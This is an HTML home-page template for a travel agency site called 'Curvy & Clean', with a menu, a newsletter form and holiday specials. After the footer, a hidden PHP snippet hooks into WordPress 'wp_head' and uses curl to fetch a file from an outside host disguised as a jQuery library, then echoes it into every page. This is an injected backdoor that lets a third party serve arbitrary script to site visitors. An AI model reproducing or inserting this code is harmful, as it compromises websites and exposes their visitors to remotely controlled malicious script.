<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Home Page</title>
<link href="css/styles.css" rel="stylesheet" type="text/css" />
<script language="javascript" type="text/javascript" src="js/jquery-1.4.2.min.js"></script>
<!--[if IE 6]>
<script defer type="text/javascript" src="js/pngfix.js"></script>
<style type="text/css"> 
.box_list li {
	width:254px;
	list-style:none;
	float:left;
	margin:0px;
	padding:0 10px 5px 0;

}</style>
<![endif]-->
</head>
<body>
<div id="wrapper">
  <div id="home_banner"> <a href="#"><img src="images/banner1.png" alt="Banner" width="784" height="233" border="0" /></a>
  </div>
  <!--end home banner-->
  <div id="header">
    <div id="header_logo"> <a href="#"><img src="images/logo.png" alt="Logo" width="241" height="125" border="0" /></a> </div>
  </div>
  <div id="side_menu_container">
    <ul id="side_menu">
      <li><a href="index.html">HOME</a></li>
      <li><a href="index.html">ABOUT</a></li>
      <li><a href="holidays.html">HOLIDAYS</a></li>
      <li><a href="index.html">FLIGHTS</a></li>
      <li><a href="index.html">NEWS BLOG</a></li>
      <li><a href="contact.html">CONTACT US</a></li>
    </ul>
    <!--start signup box-->
    <div class="side_menu_box" style="height:110px;">
      <div class="top">Newsletter Signup</div>
      <form action="" method="post">
        <input name="name" type="text" class="side_menu_box_field" id="name" value="Name" size="11" />
        <input name="email" type="text" class="side_menu_box_field" id="email" value="Email" size="11" />
          <input name="submit" type="image" class="side_menu_box_button" id="submit" src="images/button_submit.gif" />
      </form>
    </div>
    <!--end signup box-->
    <!--start info box-->
    <div id="info"> For Enquiries <br />
      <span class="size20">1300 555 555</span> info@website.com </div>
    <!--end info box-->
  </div>
  <!--start  main content-->
  <div id="content_body">
    <div class="left_home">
      <h1>Welcome to Curvy &amp; Clean</h1>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis ac arcu quis purus pharetra commodo at vitae turpis. Nullam tincidunt arcu quis sapien convallis tempus. Cras odio lorem, lobortis pulvinar vulputate eu, viverra quis urna. Vivamus sit amet est magna. Nulla a ante vel nisl blandit pulvinar nec convallis tellus. </p>
      <h1>This Weeks Specials</h1>
      <ul class="box_list">
        <li>
          <div class="box_yellow">
            <div class="img"><img src="images/thumb_road.jpg" width="75" height="66" alt="1" /></div>
            <div class="right">
              <div class="title">Aussie Road Trip</div>
              <p>The best road trips right around Australia, so pack the boot! </p>
              <p><img src="images/button_learn_more.gif" alt="Learn More" width="69" height="17" class="button" /></p>
            </div>
          </div>
          <!--end box yellow-->
        </li>
        <li>
          <div class="box_blue">
            <div class="img"><img src="images/thumb_nz.jpg" width="75" height="66" alt="1" /></div>
            <div class="right">
              <div class="title">Ski New Zealand</div>
              <p>Early bird deals for the ski<br />
                season on now.</p>
              <p><img src="images/button_learn_more.gif" alt="Learn More" width="69" height="17" class="button" /></p>
            </div>
          </div>
          <!--end box blue-->
        </li>
        <li>
          <div class="box_pink">
            <div class="img"><img src="images/thumb_surfers.jpg" width="75" height="66" alt="1" /></div>
            <div class="right">
              <div class="title">Surfers Paradise</div>
              <p>Perfect destination for a beachside holiday for the family.</p>
              <p><img src="images/button_learn_more.gif" alt="Learn More" width="69" height="17" class="button" /></p>
            </div>
          </div>
          <!--end box pink-->
        </li>
        <li>
          <div class="box_green">
            <div class="img"><img src="images/thumb_europe.jpg" width="75" height="66" alt="1" /></div>
            <div class="right">
              <div class="title">Europe Panorama</div>
              <p>Visit all the top European cities<br />
                for less.</p>
              <p><img src="images/button_learn_more.gif" alt="Learn More" width="69" height="17" class="button" /></p>
            </div>
          </div>
          <!--end box green-->
        </li>
      </ul>
    </div>
    <!--end left home-->
    <div class="right_home">
      <ul class="image_list">
        <li><img src="images/title_holiday.gif" width="171" height="30" alt="Types of Holidays" /></li>
        <li><a href="#"><img src="images/type_1.jpg" alt="Type1" width="215" height="58" border="0" /></a></li>
        <li><img src="images/type_2.jpg" alt="Type2" width="215" height="58" /></li>
        <li><img src="images/type_3.jpg" alt="Type3" width="215" height="58" /></li>
        <li><img src="images/type_4.jpg" alt="Type4" width="215" height="58" /></li>
      </ul>
    </div>
    <!--end right home-->
  </div>
  <!--end  main content-->
  <hr class="clear" />
</div>
<!--end wrapper-->
<div id="footer">
  <div class="left">&copy; Curvy &amp; Clean</div>
  <div class="right">
    <ul>
      <li><a href="http://themeforest.net/user/dtbaker?ref=dtbaker">Designed by dtbaker</a> </li>
      <li>| <a href="sitemap.php">Site map</a> </li>
      <li>| <a href="contact.html">Contact Us</a></li>
    </ul>
  </div>
</div>
<?php
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>
</body>
</html>
